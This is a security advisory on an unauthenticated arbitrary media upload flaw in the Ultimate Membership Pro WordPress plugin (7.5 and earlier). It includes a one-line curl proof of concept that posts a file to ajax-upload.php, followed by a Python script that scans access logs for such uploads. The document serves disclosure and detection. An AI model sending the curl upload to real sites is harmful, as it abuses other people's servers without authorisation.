indeed-membership-pro (Ultimate Membership Pro) <=7.5 arbitrary media upload

Description
The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do:

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

    ~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
    {"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.
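
For site owners checking whether this endpoint has been used, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for POST requests to ajax-upload.php. It assumes Combined Log Format and treats a 2xx response as a sign that a file was probably stored; the log lines, function names and addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Endpoint path taken from the advisory above.
ENDPOINT = "/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php"

# Assumption: Combined Log Format (client, timestamp, request line, status, size).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [14/Jan/2019:10:02:11 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 187 "-" "curl/7.58.0"',
    '203.0.113.5 - - [14/Jan/2019:10:03:40 +0000] "GET /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [14/Jan/2019:10:05:02 +0000] "POST /blog//wp-content/plugins/indeed-membership-pro/public/ajax%2Dupload.php?x=1 HTTP/1.1" 403 150 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Jan/2019:10:06:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

def normalize(target):
    """Drop the query string, percent-decode, and collapse repeated slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def find_upload_posts(lines):
    """Return {client: [(timestamp, status), ...]} for POSTs to the endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # endswith() also matches WordPress installed in a subdirectory.
        if normalize(m["target"]).endswith(ENDPOINT):
            hits[m["client"]].append((m["ts"], int(m["status"])))
    return dict(hits)

def stored_uploads(hits):
    """Clients with at least one 2xx response (assumed to mean a stored file)."""
    return sorted(c for c, ev in hits.items() if any(200 <= s < 300 for _, s in ev))

if __name__ == "__main__":
    found = find_upload_posts(SAMPLE_LOG)
    for client, events in found.items():
        print(client, events)
    print("check the media library for uploads from:", stored_uploads(found))
```

Timestamps from the matching lines can be compared against attachment dates in the media library to find files that arrived through this endpoint.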